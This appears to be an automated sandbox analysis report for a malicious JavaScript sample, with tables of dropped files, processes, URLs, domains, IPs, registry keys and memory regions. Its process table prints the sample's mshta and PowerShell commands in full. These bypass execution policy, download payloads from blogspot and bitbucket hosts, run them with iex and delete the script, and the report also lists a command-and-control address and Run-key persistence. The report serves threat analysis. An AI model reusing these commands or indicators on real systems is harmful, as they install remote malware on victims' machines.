Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
0a0#U00a0.js
|
ASCII text, with very long lines (65536), with no line terminators
|
initial sample
|
||
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_1b13bcbd6a21794da7049b68e35e218e48fee6a_00000000_770fa09e-0f63-403a-ad74-8f7b493fa84d\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Msbuild.exe_1b13bcbd6a21794da7049b68e35e218e48fee6a_00000000_f8beead5-23bf-46c9-bd19-9eea4c28b5e6\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_cdd7f141287fe4f2bea0fe3446c14e10358859db_00000000_bb7d22c6-b85c-4d76-9feb-9ffa1d6a0e46\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_cdd7f141287fe4f2bea0fe3446c14e10358859db_00000000_de0f10d2-655a-471d-83f3-d519d07b7510\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER43E.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER49C.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4CC.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4FB.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D5.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER613.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER653.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WER654.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\nippleskulcha\oaisjdnlijasndijasndijasmidjamsjd.~!!@@!!@@!@@!!@@!@@!!@@!!~
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\error[1]
|
HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\error[1]
|
HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0l3mb5cm.uhk.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4hwwx0zx.kzt.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cilhall0.l2i.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cvoktpkd.mjg.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_edgkty2p.2jf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_enc2153z.eyy.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ki3zpz2k.euc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ylvyld20.lse.ps1
|
ASCII text, with no line terminators
|
dropped
|
There are 17 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0a0#U00a0.js"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;&
('{1}{0}' -f 'ex', 'I') $(irm https://11-22hoot.blogspot.com////////////////////lora.pdf);Start-Sleep -Seconds 3;
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
|
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
|
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
|
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
|
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe
|
"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe
|
"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
|
||
C:\Windows\SysWOW64\svchost.exe
|
"C:\Windows\System32\svchost.exe"
|
||
C:\Windows\System32\mshta.exe
|
C:\Windows\system32\mshta.EXE "javascript:xf=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol
= [Net.SecurityProtocolType]::Tls12;(irm https://hoot22nov.blogspot.com/nipple.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell',
'Scripting.FileSystemObject']; new ActiveXObject(xf[2])[xf[0]](xf[1], 0, true);close();mw=new ActiveXObject('Scripting.FileSystemObject');mw.DeleteFile(WScript.ScriptFullName);"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm
https://hoot22nov.blogspot.com/nipple.pdf) | . iex;Start-Sleep -Seconds 3;
|
||
C:\Windows\System32\mshta.exe
|
"C:\Windows\system32\mshta.exe" "javascript:ns=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol
= [Net.SecurityProtocolType]::Tls12;(irm https://hoot22nov.blogspot.com/nipple.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell',
'Scripting.FileSystemObje
|
||
C:\Windows\System32\mshta.exe
|
"C:\Windows\system32\mshta.exe" "javascript:ns=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol
= [Net.SecurityProtocolType]::Tls12;(irm https://hoot22nov.blogspot.com/nipple.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell',
'Scripting.FileSystemObje
|
||
C:\Windows\System32\mshta.exe
|
C:\Windows\system32\mshta.EXE "javascript:xf=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol
= [Net.SecurityProtocolType]::Tls12;(irm https://hoot22nov.blogspot.com/nipple.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell',
'Scripting.FileSystemObject']; new ActiveXObject(xf[2])[xf[0]](xf[1], 0, true);close();mw=new ActiveXObject('Scripting.FileSystemObject');mw.DeleteFile(WScript.ScriptFullName);"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm
https://hoot22nov.blogspot.com/nipple.pdf) | . iex;Start-Sleep -Seconds 3;
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
|
dw20.exe -x -s 804
|
||
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
|
dw20.exe -x -s 800
|
||
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
|
dw20.exe -x -s 780
|
||
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
|
dw20.exe -x -s 804
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 17 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://11-22hoot.blogspot.com////////////////////lora.pdf);Start-Sleep
|
unknown
|
||
https://hoot22nov.blogspot.com
|
unknown
|
||
https://hoot22nov.blogspot.com/nipple.pdf)
|
unknown
|
||
https://11-22hoot.blogspot.com
|
unknown
|
||
https://hoot22nov.blogspot.com/
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://www.blogger.com/feeds/71132146144
|
unknown
|
||
https://www.blogger.com/feeds/7113214614470575974/posts/default?alt=atom
|
unknown
|
||
http://hoot22nov.blogspot.com
|
unknown
|
||
https://hoot22nov.blogspot.com/feeds/posts/default
|
unknown
|
||
http://pubsubhubbub.appspot.com/
|
unknown
|
||
http://blogspot.l.googleusercontent.com
|
unknown
|
||
https://hoot22nov.blogspot.com/nipple.pdf
|
172.217.21.33
|
||
https://www.blogger.com/feeds/7113214614470575974R
|
unknown
|
||
http://schemas.google.com/g/2005
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://www.blogger.com/feeds/71
|
unknown
|
||
https://bitbucket.org/!api/2.0/snippets/chutiyamahi/q7Bo4x/be44a5fed3fe78b384dd1cbea5e223ef1a376ad2/files/hotelnewspam.txt
|
185.166.143.48
|
||
http://schemas.google.com/g/2005#thumbnail
|
unknown
|
||
https://11-22hoot.blogspot.com////////////////////lora.pdfx.
|
unknown
|
||
https://185.196.11.18:7257/6d5f5120d519e2005/hox46u87.3n7nm
|
unknown
|
||
https://11-22hoot.blogspot.com////////////////////lora.pdf
|
142.250.181.1
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://bitbucket.org
|
unknown
|
||
https://bitbucket.org/
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
http://www.blogger.com
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://a9.com/-/spec/opensearchrss/1.0/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://img1.blogblog.com/img/b16-rounded.gif
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://hoot22nov.blogspot.com/nipple.pdfX
|
unknown
|
||
https://www.blogger.com/feeds/71132146144&K
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://hoot22nov.blogspot.com/atom.xml
|
172.217.21.33
|
||
https://www.blogger.com/feeds/7113214614470575974
|
unknown
|
||
http://crl.m
|
unknown
|
||
http://schemas.google.com/blogger/2008
|
unknown
|
||
https://185.196.11.18:7257/6d5f5120d519e2005/hox46u87.3n7nmx
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://www.georss.org/georss
|
unknown
|
||
http://www.blogger.com/styles/atom.css
|
unknown
|
||
https://11-22hoot.blogspot.com/atom.xml
|
142.250.181.1
|
There are 39 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
11-22hoot.blogspot.com
|
unknown
|
||
hoot22nov.blogspot.com
|
unknown
|
||
bitbucket.org
|
185.166.143.48
|
||
blogspot.l.googleusercontent.com
|
142.250.181.1
|
||
s-part-0035.t-0009.t-msedge.net
|
13.107.246.63
|
||
fp2e7a.wpc.phicdn.net
|
192.229.221.95
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
142.250.181.1
|
blogspot.l.googleusercontent.com
|
United States
|
||
185.166.143.48
|
bitbucket.org
|
Germany
|
||
172.217.21.33
|
unknown
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Uplatistarlt-136
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Uplatil-155
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
|
ExecutionPolicy
|
||
HKEY_CURRENT_USER\SOFTWARE\SibCode
|
sn3
|
||
HKEY_CURRENT_USER\SOFTWARE\SibCode
|
sn3
|
||
HKEY_CURRENT_USER_Classes\VirtualStore\MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
HKEY_CURRENT_USER_Classes\VirtualStore\MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData
|
TickCount
|
There are 11 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
3750000
|
direct allocation
|
page execute and read and write
|
||
2FE0000
|
direct allocation
|
page read and write
|
||
5180000
|
direct allocation
|
page execute and read and write
|
||
161B4D07000
|
heap
|
page read and write
|
||
1CBBF887000
|
heap
|
page read and write
|
||
3061000
|
trusted library allocation
|
page read and write
|
||
2F9D000
|
trusted library allocation
|
page read and write
|
||
E10000
|
heap
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
4D7E000
|
stack
|
page read and write
|
||
1CBBF87D000
|
heap
|
page read and write
|
||
1FD31180000
|
heap
|
page read and write
|
||
1CAA2BB0000
|
heap
|
page read and write
|
||
1CA88A70000
|
heap
|
page read and write
|
||
27810210000
|
trusted library allocation
|
page read and write
|
||
19EE76D0000
|
heap
|
page read and write
|
||
27802A1C000
|
trusted library allocation
|
page read and write
|
||
2FF9000
|
trusted library allocation
|
page read and write
|
||
1CBBF7EF000
|
heap
|
page read and write
|
||
19EE7CB1000
|
trusted library allocation
|
page read and write
|
||
1CA88B4C000
|
heap
|
page read and write
|
||
1350000
|
heap
|
page read and write
|
||
19EE5C70000
|
heap
|
page read and write
|
||
19EE5C90000
|
heap
|
page read and write
|
||
354C000
|
heap
|
page read and write
|
||
1CA8AC5C000
|
trusted library allocation
|
page read and write
|
||
1CBBD910000
|
heap
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
DE9000
|
stack
|
page read and write
|
||
1A00000
|
trusted library allocation
|
page read and write
|
||
3F81000
|
trusted library allocation
|
page read and write
|
||
5B23000
|
unkown
|
page read and write
|
||
2FE9000
|
trusted library allocation
|
page read and write
|
||
1FD311CE000
|
heap
|
page read and write
|
||
161B3540000
|
heap
|
page read and write
|
||
3049000
|
trusted library allocation
|
page read and write
|
||
27802959000
|
trusted library allocation
|
page read and write
|
||
161B32E9000
|
heap
|
page read and write
|
||
1140000
|
heap
|
page execute and read and write
|
||
20533240000
|
heap
|
page read and write
|
||
12D34ED1000
|
heap
|
page read and write
|
||
EE0000
|
heap
|
page read and write
|
||
1FD32BC0000
|
heap
|
page read and write
|
||
169B5260000
|
heap
|
page readonly
|
||
B70000
|
heap
|
page read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
1CA8A605000
|
heap
|
page read and write
|
||
13D0000
|
heap
|
page read and write
|
||
19EE5C40000
|
heap
|
page read and write
|
||
5A10000
|
unkown
|
page read and write
|
||
60B0000
|
trusted library allocation
|
page execute and read and write
|
||
125324B6000
|
heap
|
page read and write
|
||
1CA88B3F000
|
heap
|
page read and write
|
||
2E60000
|
trusted library allocation
|
page read and write
|
||
161B3320000
|
heap
|
page read and write
|
||
19EFFE07000
|
heap
|
page read and write
|
||
1CA88B89000
|
heap
|
page read and write
|
||
1CBBF802000
|
heap
|
page read and write
|
||
1CBBF83F000
|
heap
|
page read and write
|
||
3A819FE000
|
stack
|
page read and write
|
||
1CA8B5DA000
|
trusted library allocation
|
page read and write
|
||
9E2338D000
|
stack
|
page read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
169B5730000
|
trusted library allocation
|
page execute
|
||
9C833A2000
|
stack
|
page read and write
|
||
E20000
|
heap
|
page read and write
|
||
595F000
|
stack
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
161B33CA000
|
heap
|
page read and write
|
||
9F998FE000
|
stack
|
page read and write
|
||
1CA8A5A0000
|
heap
|
page execute and read and write
|
||
305B000
|
trusted library allocation
|
page read and write
|
||
4D082FD000
|
stack
|
page read and write
|
||
163D000
|
heap
|
page read and write
|
||
27800080000
|
trusted library allocation
|
page read and write
|
||
5A00000
|
unkown
|
page read and write
|
||
9E0000
|
heap
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
1CBBF84A000
|
heap
|
page read and write
|
||
9F9A88A000
|
stack
|
page read and write
|
||
19EE863A000
|
trusted library allocation
|
page read and write
|
||
1592000
|
trusted library allocation
|
page execute and read and write
|
||
9E221FE000
|
stack
|
page read and write
|
||
27810252000
|
trusted library allocation
|
page read and write
|
||
5D3E000
|
unkown
|
page read and write
|
||
19EE5CDC000
|
heap
|
page read and write
|
||
1CBBF866000
|
heap
|
page read and write
|
||
1CA8AC48000
|
trusted library allocation
|
page read and write
|
||
2FFF000
|
trusted library allocation
|
page read and write
|
||
A78000
|
heap
|
page read and write
|
||
1CBBF884000
|
heap
|
page read and write
|
||
1CBBF871000
|
heap
|
page read and write
|
||
5E3F000
|
stack
|
page read and write
|
||
161B4E70000
|
heap
|
page read and write
|
||
161B332A000
|
heap
|
page read and write
|
||
14D0000
|
trusted library allocation
|
page read and write
|
||
9F9A68E000
|
stack
|
page read and write
|
||
1CBBF875000
|
heap
|
page read and write
|
||
12D359F4000
|
heap
|
page read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
1150000
|
heap
|
page read and write
|
||
7FFD9B6D0000
|
trusted library allocation
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
64629FB000
|
stack
|
page read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
7FFD9B7B0000
|
trusted library allocation
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
7FFD9B700000
|
trusted library allocation
|
page read and write
|
||
1CBBF866000
|
heap
|
page read and write
|
||
157B000
|
trusted library allocation
|
page execute and read and write
|
||
2F97000
|
trusted library allocation
|
page read and write
|
||
9C8498E000
|
stack
|
page read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
12D342A9000
|
heap
|
page read and write
|
||
19EFFEC0000
|
heap
|
page read and write
|
||
12533F4D000
|
heap
|
page read and write
|
||
1CA8A600000
|
heap
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
1CAA2EA8000
|
heap
|
page read and write
|
||
169B6081000
|
heap
|
page read and write
|
||
27803E1C000
|
trusted library allocation
|
page read and write
|
||
161B354E000
|
heap
|
page read and write
|
||
1CA8B644000
|
trusted library allocation
|
page read and write
|
||
1CBBF852000
|
heap
|
page read and write
|
||
1FD30F70000
|
heap
|
page read and write
|
||
1334000
|
trusted library allocation
|
page read and write
|
||
14EE000
|
stack
|
page read and write
|
||
24FB5EF0000
|
heap
|
page read and write
|
||
3200000
|
heap
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
161B3390000
|
heap
|
page read and write
|
||
30A4000
|
trusted library allocation
|
page read and write
|
||
2F93000
|
trusted library allocation
|
page read and write
|
||
1CBBF884000
|
heap
|
page read and write
|
||
1FD30FCF000
|
heap
|
page read and write
|
||
2FB5000
|
trusted library allocation
|
page read and write
|
||
27FE000
|
stack
|
page read and write
|
||
1CBBF877000
|
heap
|
page read and write
|
||
374F000
|
stack
|
page read and write
|
||
12532469000
|
heap
|
page read and write
|
||
1CAA2E9C000
|
heap
|
page read and write
|
||
9D5000
|
heap
|
page read and write
|
||
19EE7BFB000
|
trusted library allocation
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
E3B000
|
trusted library allocation
|
page execute and read and write
|
||
19EE7740000
|
heap
|
page execute and read and write
|
||
1837000
|
trusted library allocation
|
page execute and read and write
|
||
3037000
|
trusted library allocation
|
page read and write
|
||
19EE5E80000
|
heap
|
page read and write
|
||
3B90000
|
direct allocation
|
page read and write
|
||
6461FFE000
|
stack
|
page read and write
|
||
9C8387E000
|
stack
|
page read and write
|
||
57E1000
|
direct allocation
|
page execute and read and write
|
||
D92000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B566000
|
trusted library allocation
|
page execute and read and write
|
||
1CBBF88B000
|
heap
|
page read and write
|
||
14E5000
|
heap
|
page read and write
|
||
155F000
|
stack
|
page read and write
|
||
57E3000
|
direct allocation
|
page execute and read and write
|
||
303D000
|
trusted library allocation
|
page read and write
|
||
7FFD9B6F0000
|
trusted library allocation
|
page read and write
|
||
A10000
|
heap
|
page read and write
|
||
5A00000
|
unkown
|
page read and write
|
||
1CBBDCDD000
|
heap
|
page read and write
|
||
5B0F000
|
stack
|
page read and write
|
||
9E2330A000
|
stack
|
page read and write
|
||
18C0000
|
trusted library allocation
|
page read and write
|
||
1CBBD94C000
|
heap
|
page read and write
|
||
161B3546000
|
heap
|
page read and write
|
||
19EE866A000
|
trusted library allocation
|
page read and write
|
||
19EF7BB1000
|
trusted library allocation
|
page read and write
|
||
19EE864A000
|
trusted library allocation
|
page read and write
|
||
3087000
|
trusted library allocation
|
page read and write
|
||
3821000
|
trusted library allocation
|
page read and write
|
||
2FD0000
|
heap
|
page read and write
|
||
257B7DAE000
|
heap
|
page read and write
|
||
1FD311B4000
|
heap
|
page read and write
|
||
161B4CF4000
|
heap
|
page read and write
|
||
1CBBF85B000
|
heap
|
page read and write
|
||
1FD30FBE000
|
heap
|
page read and write
|
||
DB0000
|
trusted library allocation
|
page read and write
|
||
12D359F0000
|
heap
|
page read and write
|
||
9E2257E000
|
stack
|
page read and write
|
||
1CBBF881000
|
heap
|
page read and write
|
||
169B6097000
|
heap
|
page read and write
|
||
1CBBF869000
|
heap
|
page read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
7FFD9B484000
|
trusted library allocation
|
page read and write
|
||
1CA8B5CD000
|
trusted library allocation
|
page read and write
|
||
1CBBF88E000
|
heap
|
page read and write
|
||
1CBBF867000
|
heap
|
page read and write
|
||
4D20000
|
trusted library allocation
|
page execute and read and write
|
||
1CBBF841000
|
heap
|
page read and write
|
||
1CBBD900000
|
heap
|
page read and write
|
||
1340000
|
trusted library allocation
|
page read and write
|
||
1CBBF887000
|
heap
|
page read and write
|
||
1CAA2ED2000
|
heap
|
page read and write
|
||
1CBBF866000
|
heap
|
page read and write
|
||
E2C000
|
heap
|
page read and write
|
||
4DA0000
|
trusted library allocation
|
page read and write
|
||
161B32E0000
|
heap
|
page read and write
|
||
7FFD9B621000
|
trusted library allocation
|
page read and write
|
||
9C8377E000
|
stack
|
page read and write
|
||
1CBBF86B000
|
heap
|
page read and write
|
||
1CBBF86F000
|
heap
|
page read and write
|
||
1CBBF880000
|
heap
|
page read and write
|
||
9C83C7E000
|
stack
|
page read and write
|
||
7FFD9B750000
|
trusted library allocation
|
page read and write
|
||
27818A01000
|
trusted library allocation
|
page read and write
|
||
1CBBF866000
|
heap
|
page read and write
|
||
1CBBF873000
|
heap
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
19EE7CBB000
|
trusted library allocation
|
page read and write
|
||
9F996FA000
|
stack
|
page read and write
|
||
24FB61AD000
|
heap
|
page read and write
|
||
1CA8B63E000
|
trusted library allocation
|
page read and write
|
||
2FA0000
|
heap
|
page read and write
|
||
370E000
|
stack
|
page read and write
|
||
1CBBF860000
|
heap
|
page read and write
|
||
161B3334000
|
heap
|
page read and write
|
||
2FDD000
|
trusted library allocation
|
page read and write
|
||
1130000
|
trusted library allocation
|
page read and write
|
||
1CBBF849000
|
heap
|
page read and write
|
||
7FFD9B526000
|
trusted library allocation
|
page read and write
|
||
24FB61A0000
|
heap
|
page read and write
|
||
1CBBF802000
|
heap
|
page read and write
|
||
1CBBDCD9000
|
heap
|
page read and write
|
||
D44000
|
trusted library allocation
|
page read and write
|
||
161B3346000
|
heap
|
page read and write
|
||
9BE000
|
stack
|
page read and write
|
||
5CDF000
|
stack
|
page read and write
|
||
9E2320F000
|
stack
|
page read and write
|
||
7FFD9B473000
|
trusted library allocation
|
page execute and read and write
|
||
24FB5FA2000
|
heap
|
page read and write
|
||
2FD5000
|
trusted library allocation
|
page read and write
|
||
57AE000
|
stack
|
page read and write
|
||
1CAA2CB4000
|
heap
|
page read and write
|
||
1CBBF85A000
|
heap
|
page read and write
|
||
2FF3000
|
trusted library allocation
|
page read and write
|
||
2FA9000
|
trusted library allocation
|
page read and write
|
||
278029DF000
|
trusted library allocation
|
page read and write
|
||
2FFB000
|
trusted library allocation
|
page read and write
|
||
2F95000
|
trusted library allocation
|
page read and write
|
||
1CBBF875000
|
heap
|
page read and write
|
||
1CBBF885000
|
heap
|
page read and write
|
||
64621FE000
|
stack
|
page read and write
|
||
7FFD9B652000
|
trusted library allocation
|
page read and write
|
||
5B3C000
|
stack
|
page read and write
|
||
29EE000
|
stack
|
page read and write
|
||
A70000
|
heap
|
page read and write
|
||
4D40000
|
trusted library allocation
|
page read and write
|
||
161B339A000
|
heap
|
page read and write
|
||
1CBBF877000
|
heap
|
page read and write
|
||
2B2B000
|
trusted library allocation
|
page read and write
|
||
354C000
|
heap
|
page read and write
|
||
1CBBF802000
|
heap
|
page read and write
|
||
3043000
|
trusted library allocation
|
page read and write
|
||
7FFD9B670000
|
trusted library allocation
|
page read and write
|
||
1CBBF924000
|
